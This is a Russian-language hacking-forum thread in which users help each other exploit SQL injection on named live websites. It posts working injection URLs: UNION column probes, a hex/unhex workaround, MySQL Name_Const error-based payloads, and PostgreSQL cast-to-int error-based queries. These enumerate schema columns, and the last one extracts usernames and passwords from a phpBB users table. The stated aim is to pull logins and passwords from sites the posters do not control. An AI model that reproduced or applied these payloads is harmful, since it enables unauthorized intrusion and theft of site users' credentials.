ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Народ подскажите. Есть сайт, есть sql-injection при таком запросе
-11+UNION+SELECT+1,2,3,4,5,6/* выводит числа 3 и 6 когда подставляю строковые данные ну например version() или любое другое слово выбивает ошибку подскажите что можно сделать с таким сайтом

омг, какой раз уже писалось =\
unhex(hex(version()))

_http://forum.antichat.ru/thread104591.html , см Вопрос №2

Как из этих кусков логины и пароли вынести?

http://www.ollis.ru/index.php?id=cabinet')+order+by+7%23&type=cabinet& action=lost_pw&mode=return_from_hidden


http://www.ollis.ru/index.php?id=cabinet')+and+(1,2)=(Select*From(Sele ct+Name_Const(version(),1),Name_Const(version(),1) )a)%23&type=cabinet&action=lost_pw&mode=return_fro m_hidden

скул есть это уж точно и поле тоже тока 1, но может я что то не догнал, больше никак не могу раскрутит.
Можеть посоветуете с методами

Это PostgreSQL
http://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELE CT+version()||chr(58)||current_user||chr(58)||curr ent_database())+as+int)--

таблицы норм выводится через limit offset но на колонки ругается
пххп://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELE CT+column_name+from+information_schema.columns+whe re+table_name=chr(39)||pg_user||chr(39)+limit+1+of fset+0)+as+int)--

имя таблицы лучше писать в сhr(), а не просто кавычки чарить, по аналогии с MySql, а у тебя гибрид какой-то конгениальный)

сначала проверил и имя таблицы в char но ничего не вышло тот же яйцо , но с боку

YuNi|[c,

http://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((sele ct+table_name||chr(47)||column_name+from+informati on_schema.columns+where+column_name+like+chr(37)|| chr(109)||chr(97)||chr(105)||chr(108)||chr(37)+lim it+1+offset+6)+as+int)


http://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((sele ct+username||chr(47)||user_password+from+phpbb_use rs2+limit+1+offset+1)+as+int)